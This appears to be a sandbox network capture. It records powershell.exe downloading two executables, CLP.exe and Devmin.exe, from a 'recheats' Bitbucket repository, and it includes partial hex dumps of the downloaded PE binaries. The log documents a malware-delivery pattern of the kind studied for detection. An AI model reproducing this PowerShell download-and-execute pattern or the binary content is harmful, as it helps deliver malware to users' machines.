                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 53 47 43 4c 41 42 35 51 41 56 4f 4c 41 55 54 51 39 56 42 46 4d 36 4b 56 42 43 45 51 46 43 4b 49 55 36 53 4f 54 48 50 39 36 41 4c 35 41 46 53 57 51 45 49 38 50 43 4b 34 46 52 56 4c 42 39 35 52 4a 55 47 4f 53 45 4d 47 45 47 5a 4b 54 49 42 4a 57 45 53 43 37 4d 50 53 51 51 36 35 38 42 53 4c 58 37 42 43 49 58 37 37 47 4b 4a 4d 50 4d 44 58 57 42 41 4a 43 36 34 51 45 43 41 4c 39 45 56 39 52 46 45 43 42 44 35 52 56 52 57 58 42 36 46 43 51 57 52 56 56 55 45 4c 48 4d 51 46 37 51 36 4c 41 42 56 4c 42 50 53 51 34 44 4a 45 55 59 4c 55 46 46 39 4a 34 59 4d 44 59 41 36 46 42 34 43 48 38 50 41 39 4f 5a 51 36 37 38 43 47 41 57 4e 49 49 42 4d 38 38 37 41 50 45 53 39 5a 41 5a 4c 57 42 44 39 55 47 54 51 4d 49 51 51 4d 39 56 4d 36 34 42 36 4d 41 51 43 4a 34 4c 39 56 54 42 50
                                                                                                  Data Ascii: SGCLAB5QAVOLAUTQ9VBFM6KVBCEQFCKIU6SOTHP96AL5AFSWQEI8PCK4FRVLB95RJUGOSEMGEGZKTIBJWESC7MPSQQ658BSLX7BCIX77GKJMPMDXWBAJC64QECAL9EV9RFECBD5RVRWXB6FCQWRVVUELHMQF7Q6LABVLBPSQ4DJEUYLUFF9J4YMDYA6FB4CH8PA9OZQ678CGAWNIIBM887APES9ZAZLWBD9UGTQMIQQM9VM64B6MAQCJ4L9VTBP
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 59 41 41 42 56 39 37 39 4f 41 4d 56 57 44 47 4d 52 4f 4d 52 57 4b 36 46 44 43 45 41 41 43 46 58 4b 51 4f 4f 5a 57 41 4c 46 4b 50 48 49 48 46 4e 34 51 4e 35 47 56 41 56 4c 4e 4b 42 43 34 46 51 35 43 4f 4c 4c 56 42 59 49 52 35 5a 49 56 49 5a 4b 51 4a 55 59 48 54 55 48 51 4c 36 42 47 38 46 44 42 4d 52 54 4b 57 59 46 4b 4d 54 39 56 4b 35 54 4e 4d 46 59 46 4d 34 4c 46 4e 37 35 55 38 5a 53 47 35 54 41 41 41 54 49 37 50 49 39 51 41 41 43 50 4f 42 53 57 36 4a 4c 52 46 4a 59 50 53 36 45 4c 59 42 37 51 45 53 44 46 4d 46 59 45 4e 36 35 53 4d 58 34 36 45 54 54 52 49 46 57 47 59 35 39 37 4d 4e 44 34 41 52 35 46 4f 52 49 48 45 35 39 50 4d 4e 53 58 47 36 34 4f 4f 45 41 41 41 56 52 39 4e 46 5a 48 49 37 4c 42 4e 52 4a 48 45 37 54 55 35 5a 50 48 4b 41 44 51 4f 4a 53 38 4a
                                                                                                  Data Ascii: YAABV979OAMVWDGMROMRWK6FDCEAACFXKQOOZWALFKPHIHFN4QN5GVAVLNKBC4FQ5COLLVBYIR5ZIVIZKQJUYHTUHQL6BG8FDBMRTKWYFKMT9VK5TNMFYFM4LFN75U8ZSG5TAAATI7PI9QAACPOBSW6JLRFJYPS6ELYB7QESDFMFYEN65SMX46ETTRIFWGY597MND4AR5FORIHE59PMNSXG64OOEAAAVR9NFZHI7LBNRJHE7TU5ZPHKADQOJS8J


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49731
Destination IP: 185.166.143.49
Destination Port: 443
PID: 7520
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-04 17:13:19 UTC | 118 | OUT | GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe HTTP/1.1
                                                                                                  Host: bitbucket.org
2024-10-04 17:13:20 UTC | 4028 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Fri, 04 Oct 2024 17:13:20 GMT
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Content-Length: 293888
                                                                                                  Server: AtlassianEdge
                                                                                                  Content-Disposition: attachment
                                                                                                  Vary: Authorization, Accept-Language, Origin
                                                                                                  Cache-Control: s-maxage=900, max-age=900
                                                                                                  Last-Modified: Tue, 10 Jan 2023 15:00:12 GMT
                                                                                                  Etag: "5d17badb31672756832ca3e395738d26"
                                                                                                  X-Used-Mesh: False
                                                                                                  Content-Language: en
                                                                                                  X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
                                                                                                  X-Dc-Location: Micros-3
                                                                                                  X-Served-By: 0ac796864926
                                                                                                  X-Version: 8e66bccd2be3
                                                                                                  X-Static-Version: 8e66bccd2be3
                                                                                                  X-Request-Count: 3374
                                                                                                  X-Render-Time: 0.09915876388549805
                                                                                                  X-B3-Traceid: 8110ffdae56f4493bc6ce66e5d12492d
                                                                                                  X-B3-Spanid: d55da61a22abe69d
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-asse [TRUNCATED]
                                                                                                  X-Usage-Quota-Remaining: 995544.552
                                                                                                  X-Usage-Request-Cost: 4484.07
                                                                                                  X-Usage-User-Time: 0.041769
                                                                                                  X-Usage-System-Time: 0.004753
                                                                                                  X-Usage-Input-Ops: 352
                                                                                                  X-Usage-Output-Ops: 0
                                                                                                  Age: 0
                                                                                                  Accept-Ranges: bytes
                                                                                                  X-Cache: MISS
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                  Atl-Traceid: 8110ffdae56f4493bc6ce66e5d12492d
                                                                                                  Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                  Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                  Server-Timing: atl-edge;dur=210,atl-edge-internal;dur=3,atl-edge-upstream;dur=209,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                  Connection: close
                                                                                                  2024-10-04 17:13:20 UTC12356INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 15 bd be a7 51 dc d0 f4 51 dc d0 f4 51 dc d0 f4 82 ae d3 f5 5c dc d0 f4 82 ae d5 f5 ff dc d0 f4 82 ae d4 f5 47 dc d0 f4 1e a0 d4 f5 40 dc d0 f4 1e a0 d3 f5 47 dc d0 f4 1e a0 d5 f5 1c dc d0 f4 82 ae d1 f5 5a dc d0 f4 51 dc d1 f4 26 dc d0 f4 90 a0 d9 f5 54 dc d0 f4 90 a0 2f f4 50 dc d0 f4 90 a0 d2 f5 50 dc d0 f4 52 69 63 68 51 dc d0 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$QQQ\G@GZQ&T/PPRichQ
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: 40 52 50 e8 54 f0 02 00 83 f8 50 0f 93 c0 8b 8c 24 94 00 00 00 33 cc e8 5e 17 01 00 8b e5 5d c3 8b 8c 24 94 00 00 00 32 c0 33 cc e8 4a 17 01 00 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 a8 2b 44 00 68 55 2c 43 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 48 50 44 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 ef be ad de ff 15 30 50 43 00 c7 45 fc fe ff ff ff 32 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 b8 01 00 00 00 c3 8b 65 e8 c7 45 fc fe ff ff ff b0 01 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 80 34 43 00 64 a1 00 00 00 00 50 81 ec 7c 02 00 00 a1 48 50 44 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 6a 00 6a 02 ff
                                                                                                  Data Ascii: @RPTP$3^]$23J]Ujh+DhU,CdPSVWHPD1E3PEdeEh0PCE2MdY_^[]eEMdY_^[]Ujh4CdP|HPD3ESVWPEdjj
                                                                                                  2024-10-04 17:13:20 UTC546INData Raw: 43 45 d8 50 ff 75 14 8d 45 b4 ff 75 10 50 53 e8 d8 fc ff ff 57 ff 75 1c 8b 08 8b 40 04 50 89 45 14 8d 45 b4 51 50 53 89 4d 10 e8 4d fc ff ff 83 c4 30 33 ff eb 20 83 7d ec 10 8d 45 d8 56 0f 43 45 d8 50 ff 75 14 8d 45 b4 ff 75 10 50 53 e8 99 fc ff ff 83 c4 18 8b 10 8b 48 04 8d 45 d8 83 7d ec 10 89 55 10 0f 43 45 d8 29 75 bc 03 c6 ff 75 bc 89 4d 14 50 51 52 8d 45 b4 50 53 e8 6b fc ff ff 8b 55 ac 8b 75 a8 57 8b 08 8b 40 04 ff 75 1c 89 4d 10 50 51 56 53 89 45 14 c7 42 20 00 00 00 00 c7 42 24 00 00 00 00 e8 cf fb ff ff 8b 4d d4 83 c4 30 83 f9 10 72 28 8b 55 c0 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 6f 51 52 e8 2c d9 00 00 83 c4 08 8b 4d ec c7 45 d0 00 00 00 00 c7 45 d4 0f 00 00 00 c6 45 c0 00 83 f9 10 72 28 8b 55 d8 41 8b
                                                                                                  Data Ascii: CEPuEuPSWu@PEEQPSMM03 }EVCEPuEuPSHE}UCE)uuMPQREPSkUuW@uMPQVSEB B$M0r(UArP#+woQR,MEEEr(UA
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: ac c7 45 fc 00 00 00 00 50 e8 ec 08 00 00 c7 45 fc ff ff ff ff 83 c4 04 8b 4d b0 89 45 b8 85 c9 74 11 8b 01 ff 50 08 8b c8 85 c9 74 06 8b 01 6a 01 ff 10 6a 00 53 8d 4d d4 e8 6c e3 ff ff 8b 4d a4 8d 45 d4 8b 55 b8 c7 45 fc 01 00 00 00 83 7d e8 10 0f 43 45 d4 8b 12 50 8d 04 0b 50 51 8b 4d b8 ff 52 1c 8b 4d a8 8b 41 30 8b 48 04 89 4d b0 8b 01 ff 50 04 8d 45 ac c6 45 fc 02 50 e8 e8 0e 00 00 c6 45 fc 01 83 c4 04 8b 55 b0 8b c8 89 4d b8 85 d2 74 16 8b 02 8b ca ff 50 08 8b c8 85 c9 74 06 8b 01 6a 01 ff 10 8b 4d b8 8b 01 8d 55 bc 52 ff 50 14 8b 4d b8 c6 45 fc 03 8b 01 8b 40 10 ff d0 88 45 a4 3b fb 74 1c 8b 4d b8 8b 01 8b 40 0c ff d0 83 7d e8 10 8a c8 8d 45 d4 0f 43 45 d4 3b fb 88 0c 38 0f 44 7d a0 8d 5d bc 83 7d d0 10 0f 43 5d bc 8a 03 3c 7f 0f 84 8f 00 00 00 84
                                                                                                  Data Ascii: EPEMEtPtjjSMlMEUE}CEPPQMRMA0HMPEEPEUMtPtjMURPME@E;tM@}ECE;8D}]}C]<
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: fc 36 33 f6 0f 28 05 10 11 44 00 0f 11 85 10 fa ff ff c7 85 20 fa ff ff 56 48 35 42 c7 85 24 fa ff ff 29 35 21 45 c7 85 28 fa ff ff 63 2b 2b 65 66 c7 85 2c fa ff ff 3c 00 90 0f b6 84 35 11 fa ff ff 8d 8d 10 fa ff ff 50 e8 0c 10 00 00 88 84 35 11 fa ff ff 46 83 fe 1c 72 df 8d 8d 10 fe ff ff c6 85 2d fa ff ff 00 c7 85 0c fe ff ff 00 00 00 00 e8 23 11 00 00 8d 8d 11 fa ff ff c6 45 fc 37 8d 51 01 66 0f 1f 44 00 00 8a 01 41 84 c0 75 f9 2b ca 8d 85 11 fa ff ff 03 c1 8d 8d 0c fe ff ff 6a 01 50 8d 85 11 fa ff ff 50 e8 5a 16 00 00 0f 28 05 90 12 44 00 33 c9 0f 11 85 8c f6 ff ff c7 85 ac f6 ff ff 51 6b 41 78 0f 28 05 e0 13 44 00 0f 11 85 9c f6 ff ff c6 85 b0 f6 ff ff 00 66 66 66 0f 1f 84 00 00 00 00 00 8a 85 8c f6 ff ff 30 84 0d 8d f6 ff ff 41 83 f9 23 72 ed ff b5
                                                                                                  Data Ascii: 63(D VH5B$)5!E(c++ef,<5P5Fr-#E7QfDAu+jPPZ(D3QkAx(Dfff0A#r
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: 74 16 80 fb 29 74 11 f6 c2 10 75 0e 8a 11 80 fa 7b 74 05 80 fa 7d 75 02 8b c1 40 89 06 8b ce e8 e6 e2 ff ff 8b 56 50 f7 c2 00 04 00 00 0f 84 6c 01 00 00 83 7e 4c 3f 0f 85 62 01 00 00 8b 06 c6 45 f4 00 3b 46 08 74 34 80 38 5c 75 2c 8d 48 01 3b 4e 08 74 24 f6 c2 08 75 0c 8a 19 80 fb 28 74 16 80 fb 29 74 11 f6 c2 10 75 0e 8a 11 80 fa 7b 74 05 80 fa 7d 75 02 8b c1 40 89 06 8b ce e8 87 e2 ff ff e9 1b 01 00 00 83 f8 3f 75 0c c7 45 f8 01 00 00 00 e9 3e ff ff ff 83 f8 7b 0f 85 12 01 00 00 8b 06 8b 56 08 3b c2 74 36 80 38 5c 75 2e 8d 48 01 3b ca 74 27 8b 56 50 f6 c2 08 75 0c 8a 19 80 fb 28 74 16 80 fb 29 74 11 f6 c2 10 75 0e 8a 11 80 fa 7b 74 05 80 fa 7d 75 02 8b c1 40 89 06 8b ce e8 22 e2 ff ff 6a 07 68 ff ff ff 7f 6a 0a 8b ce e8 92 23 00 00 3d ff ff ff 7f 0f 84
                                                                                                  Data Ascii: t)tu{t}u@VPl~L?bE;Ft48\u,H;Nt$u(t)tu{t}u@?uE>{V;t68\u.H;t'VPu(t)tu{t}u@"jhj#=
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: 00 10 00 00 ff 75 08 8b 40 04 8b 4c 30 38 8b 01 8b 40 20 ff d0 89 46 08 89 56 0c 3d 00 10 00 00 75 04 85 d2 74 3c bf 03 00 00 00 eb 35 8b 4d ec 6a 01 8b 01 8b 70 04 b8 04 00 00 00 03 f1 33 c9 8b 56 0c 83 ca 04 39 4e 38 0f 45 c1 8b ce 0b c2 50 e8 64 fb fe ff b8 c2 3e 41 00 c3 8b 75 ec 8b 7d e8 c7 45 fc 01 00 00 00 8b 06 6a 00 8b 48 04 b8 04 00 00 00 03 ce 8b 51 0c 0b d7 33 ff 39 79 38 0f 45 c7 0b c2 50 e8 2e fb fe ff c7 45 fc 04 00 00 00 8b 06 8b 40 04 8b 4c 30 38 85 c9 74 05 8b 01 ff 50 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 83 61 04 00 8b c1 83 61 08 00 c7 41 04 78 52 43 00 c7 01 70 52 43 00 c3 55 8b ec 56 ff 75 08 8b f1 e8 39 db fe ff c7 06 98 52 43 00 8b c6 5e 5d c2 04 00 55 8b ec 51 56 ff 75 08 8b f1 89 75 fc e8 4a ef fe
                                                                                                  Data Ascii: u@L08@ FV=ut<5Mjp3V9N8EPd>Au}EjHQ39y8EP.E@L08tPMdY_^[]aaAxRCpRCUVu9RC^]UQVuuJ
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: ff 0f b6 4e e8 0f b6 42 e8 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 da fa ff ff 0f b6 4e e9 0f b6 42 e9 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 b8 fa ff ff 8b 46 ea 3b 42 ea 0f 84 87 00 00 00 0f b6 c8 0f b6 42 ea 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 8b fa ff ff 0f b6 4e eb 0f b6 42 eb 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 69 fa ff ff 0f b6 4e ec 0f b6 42 ec 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 47 fa ff ff 0f b6 4e ed 0f b6 42 ed 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 25 fa ff ff 8b 46 ee 3b 42 ee 0f 84 87 00 00 00 0f b6 c8 0f b6 42 ee 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9
                                                                                                  Data Ascii: NB+t3ENB+t3EF;BB+t3ENB+t3EiNB+t3EGNB+t3E%F;BB+t3E
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: c2 04 00 8b ff 56 8b f1 57 83 46 10 04 8b 46 10 8b 78 fc e8 5c 8b 00 00 85 c0 75 24 8b 46 08 c6 40 1c 01 c7 40 18 16 00 00 00 33 c0 ff 76 08 50 50 50 50 50 e8 d3 de ff ff 83 c4 18 32 c0 eb 44 ff 76 28 e8 ee fc ff ff 59 83 e8 01 74 2b 83 e8 01 74 1d 48 83 e8 01 74 10 83 e8 04 75 be 8b 46 14 99 89 07 89 57 04 eb 15 8b 46 14 89 07 eb 0e 66 8b 46 14 66 89 07 eb 05 8a 46 14 88 07 c6 46 2c 01 b0 01 5f 5e c3 8b 51 1c 8b c2 c1 e8 05 a8 01 74 09 81 ca 80 00 00 00 89 51 1c 6a 00 e8 28 eb ff ff c3 6a 01 c7 41 24 08 00 00 00 c7 41 28 0a 00 00 00 e8 0c ee ff ff c3 8b ff 53 56 8b f1 57 83 46 10 04 8b 46 10 8b 5e 24 8b 78 fc 89 7e 30 83 fb ff 75 05 bb ff ff ff 7f ff 76 28 0f b6 46 2d 50 ff 76 04 ff 36 e8 80 e8 ff ff 83 c4 10 84 c0 74 19 85 ff 75 08 bf b8 72 43 00 89 7e
                                                                                                  Data Ascii: VWFFx\u$F@@3vPPPPP2Dv(Yt+tHtuFWFfFfFF,_^QtQj(jA$A(SVWFF^$x~0uv(F-Pv6turC~
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: f4 64 a3 00 00 00 00 83 7d 10 00 75 12 e8 96 00 00 00 84 c0 74 09 ff 75 08 e8 ef 00 00 00 59 8d 45 0c c6 45 f3 00 89 45 dc 8d 45 10 89 45 e0 8d 45 f3 89 45 e4 83 65 fc 00 8d 4d f2 6a 02 58 89 45 ec 89 45 e8 8d 45 ec 50 8d 45 dc 50 8d 45 e8 50 e8 52 fe ff ff 83 7d 10 00 74 0d 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 ff 75 08 e8 06 00 00 00 cc cc cc cc cc cc 8b ff 55 8b ec e8 6a 00 00 00 84 c0 74 10 ff 75 08 ff 15 e8 50 43 00 50 ff 15 ec 50 43 00 ff 75 08 e8 70 00 00 00 59 ff 75 08 ff 15 28 51 43 00 cc 6a 00 ff 15 44 50 43 00 85 c0 74 34 b9 4d 5a 00 00 66 39 08 75 2a 8b 48 3c 03 c8 81 39 50 45 00 00 75 1d b8 0b 01 00 00 66 39 41 18 75 12 83 79 74 0e 76 0c 83 b9 e8 00 00 00 00 74 03 b0 01 c3 32 c0 c3 e8 65 b3 00 00 83 f8 01 74 15 64 8b 0d 30 00 00 00 8b 49 68
                                                                                                  Data Ascii: d}utuYEEEEEEEeMjXEEEPEPEPR}tMdYuUjtuPCPPCupYu(QCjDPCt4MZf9u*H<9PEuf9Auytvt2etd0Ih


Session ID: 2
Source IP: 192.168.2.4
Source Port: 49732
Destination IP: 185.166.143.49
Destination Port: 443
PID: 7520
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-04 17:13:21 UTC | 121 | OUT | GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe HTTP/1.1
                                                                                                  Host: bitbucket.org
2024-10-04 17:13:22 UTC | 4031 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Fri, 04 Oct 2024 17:13:21 GMT
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Content-Length: 2330112
                                                                                                  Server: AtlassianEdge
                                                                                                  Content-Disposition: attachment
                                                                                                  Vary: Authorization, Accept-Language, Origin
                                                                                                  Cache-Control: s-maxage=900, max-age=900
                                                                                                  Last-Modified: Tue, 10 Jan 2023 15:00:12 GMT
                                                                                                  Etag: "5d17badb31672756832ca3e395738d26"
                                                                                                  X-Used-Mesh: False
                                                                                                  Content-Language: en
                                                                                                  X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
                                                                                                  X-Dc-Location: Micros-3
                                                                                                  X-Served-By: cb62c73099d7
                                                                                                  X-Version: 8e66bccd2be3
                                                                                                  X-Static-Version: 8e66bccd2be3
                                                                                                  X-Request-Count: 4073
                                                                                                  X-Render-Time: 0.11316585540771484
                                                                                                  X-B3-Traceid: 68d6a1992b57491e8ef54a649dae1565
                                                                                                  X-B3-Spanid: 7211b4316c76bfda
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com ap [TRUNCATED]
                                                                                                  X-Usage-Quota-Remaining: 956903.684
                                                                                                  X-Usage-Request-Cost: 39115.60
                                                                                                  X-Usage-User-Time: 0.069521
                                                                                                  X-Usage-System-Time: 0.005947
                                                                                                  X-Usage-Input-Ops: 4392
                                                                                                  X-Usage-Output-Ops: 0
                                                                                                  Age: 0
                                                                                                  Accept-Ranges: bytes
                                                                                                  X-Cache: MISS
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                  Atl-Traceid: 68d6a1992b57491e8ef54a649dae1565
                                                                                                  Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                  Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                  Server-Timing: atl-edge;dur=223,atl-edge-internal;dur=2,atl-edge-upstream;dur=222,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                  Connection: close
                                                                                                  2024-10-04 17:13:22 UTC12353INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b3 73 bd 63 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 f4 00 00 00 8a 23 00 00 0e 00 00 e0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 24 00 00 04 00 00 4c 1e 24 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
Data Ascii: MZ@hr!L!This program cannot be run in DOS mode.$PEdsc.&#@$L$`
(The first chunk of the response body is a PE image: e_lfanew at offset 0x3C is 0x80, the "PE\0\0" signature sits at 0x80, followed by Machine 0x8664 (x64), 11 sections and the PE32+ optional-header magic 0x20B. The Bitbucket download is therefore a 64-bit Windows executable, not a source file or archive.)
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: 07 c6 06 01 e8 66 67 00 00 48 89 d8 48 83 c4 38 5b 5e c3 66 66 2e 0f 1f 84 00 00 00 00 00 90 56 53 48 83 ec 38 66 0f 6f 05 d2 27 23 00 48 8d 0d 6b 08 01 00 0f 29 44 24 20 e8 f1 6f 00 00 48 8d 0d 3a 08 01 00 48 89 c6 e8 e2 6f 00 00 80 3e 00 48 89 c3 75 2a c6 40 10 01 48 8b 44 24 20 45 31 c0 48 89 da 48 8d 0d a4 c3 00 00 48 89 03 48 8b 44 24 28 48 89 43 08 c6 06 01 e8 f0 66 00 00 48 89 d8 48 83 c4 38 5b 5e c3 66 0f 1f 44 00 00 56 53 48 83 ec 38 48 8b 05 73 27 23 00 48 8d 0d bc 07 01 00 48 89 44 24 20 8b 05 11 24 23 00 89 44 24 28 e8 78 6f 00 00 48 8d 0d 81 07 01 00 48 89 c6 e8 69 6f 00 00 80 3e 00 48 89 c3 75 28 c6 40 0c 01 48 8b 44 24 20 45 31 c0 48 89 da 48 8d 0d eb c2 00 00 48 89 03 8b 44 24 28 89 43 08 c6 06 01 e8 79 66 00 00 48 89 d8 48 83 c4 38 5b 5e
                                                                                                  Data Ascii: fgHH8[^ff.VSH8fo'#Hk)D$ oH:Ho>Hu*@HD$ E1HHHHD$(HCfHH8[^fDVSH8Hs'#HHD$ $#D$(xoHHio>Hu(@HD$ E1HHHD$(CyfHH8[^
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: ff ff ff ff 48 c7 84 24 e8 00 00 00 00 00 00 00 e8 6c 19 00 00 4c 89 e0 f3 0f 7e 84 24 f0 00 00 00 49 c7 44 24 10 00 00 00 00 0f 16 84 24 f8 00 00 00 41 0f 11 04 24 0f 28 b4 24 80 05 01 00 0f 28 bc 24 90 05 01 00 44 0f 28 84 24 a0 05 01 00 48 81 c4 b8 05 01 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 e8 c3 2f 00 00 41 b9 ff 47 00 00 45 31 c0 c6 40 0a 01 48 8d 0d 4f 86 00 00 48 89 c3 48 8b 84 24 80 05 00 00 66 44 89 4b 08 48 89 da 48 89 03 c6 06 01 e8 d1 26 00 00 e9 2c fb ff ff 0f 1f 40 00 41 8b 45 38 4d 85 f6 49 8b 7d 40 66 0f 6e e0 89 84 24 8c 00 00 00 48 89 7c 24 68 66 0f c5 dc 01 0f 85 90 fb ff ff 41 89 f6 66 48 0f 6e f5 e9 b7 fb ff ff 0f 1f 44 00 00 44 8b 84 24 ac 00 00 00 49 89 d9 b9 05 00 00 00 48 8b 94 24 b0 00 00 00 e8 09 19 00 00 85 c0 0f
                                                                                                  Data Ascii: H$lL~$ID$$A$($($D($H[^_]A\A]A^A_/AGE1@HOHH$fDKHH&,@AE8MI}@fn$H|$hfAfHnDD$IH$
